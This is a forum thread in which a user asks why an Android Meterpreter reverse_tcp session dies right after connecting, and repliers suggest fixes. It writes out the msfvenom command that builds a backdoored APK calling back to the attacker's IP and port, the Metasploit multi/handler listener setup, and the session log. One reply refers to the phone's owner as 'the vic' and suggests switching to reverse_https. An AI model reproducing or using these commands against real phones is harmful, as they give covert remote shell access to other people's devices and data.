Forum Thread: Meterpreter on Android

Hi,

I'm looking for help in order to progress in my understanding of the use of Meterpreter over Android on a smartphone.

I currently have Kali 4.11 and the Metasploit suite on the attacker computer.
I also generated my Meterpreter payloadusing the following command :

msfvenom -p android/meterpreter/reverse_tcp LHOST=MY_WAN_IP_ADDRESS LPORT=4444 -a dalvik --platform android R -o /pentest-001.apk

Then I installed my payload over the Android 6.0.1 smartphone (a Lenovo P2) and I can see the MainActivity software installed.

Then, on the Attacker computer", I typed (see bold) :

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST MY_LAN_IP_ADDRESS
LHOST => MY_LAN_IP_ADDRESS
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
* Exploit running as background job 0.

From ther, I start MainActivity on my smartphone (connected using 4G/LTE) : I can see the following being printed on the attacker computer.

msf exploit(handler) >
* Sending stage (68925 bytes) to MY_WAN_IP_ADDRESS
* Meterpreter session 1 opened (MY_LAN_IP_ADDRESS:4444 -> MY_WAN_IP_ADDRESS:11501) at 2017-08-31 13:55:56 +0200
* negotiating tlv encryption
* negotiated tlv encryption
* negotiated tlv encryption
* MY_WAN_IP_ADDRESS - Meterpreter session 1 closed. Reason: Died

I can repeat the operation on and on, I never get the Meterpreter shell. I tried on different smartphones, BTW.

One precision : my attacker computer is behind 2 routers: Both routers forward port 4444 (first one forward to 2nd router, and 2nd router forwards to MY_LAN_IP_ADDRESS)

I also tested using port 443.

Thanks in advance for your help.

6 Responses

I also tested with only one router....

Change the WAN IP with your LAN Ip address

I also getting the same problem can you tell us what is reason..

Hey there.

I've got msf installed on my phone in termux. I tried exploiting said phone but every time i opened termux to use the session it would die. I could only imagine it was cause the backdoor wasnt persistent or being run as a service or anything so it wouldnt run in the background. Just a theory cause i was able to run the listener on my computer no problem.

Point is, maybe your having a similar issue. Maybe the vic is doing something thats killing the session.

Most phones have a setting in them to kill the wifi to save battery when the phone goes to sleep.. They may even just kill idle processes...

Maybe thats causing it.

Just a thought, its probably a long shot tho.
Ive also heard of people just using reverse_https instead. If all else fails id scrap the apk and try, try again lol

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

Share Your Thoughts

  • Hot
  • Active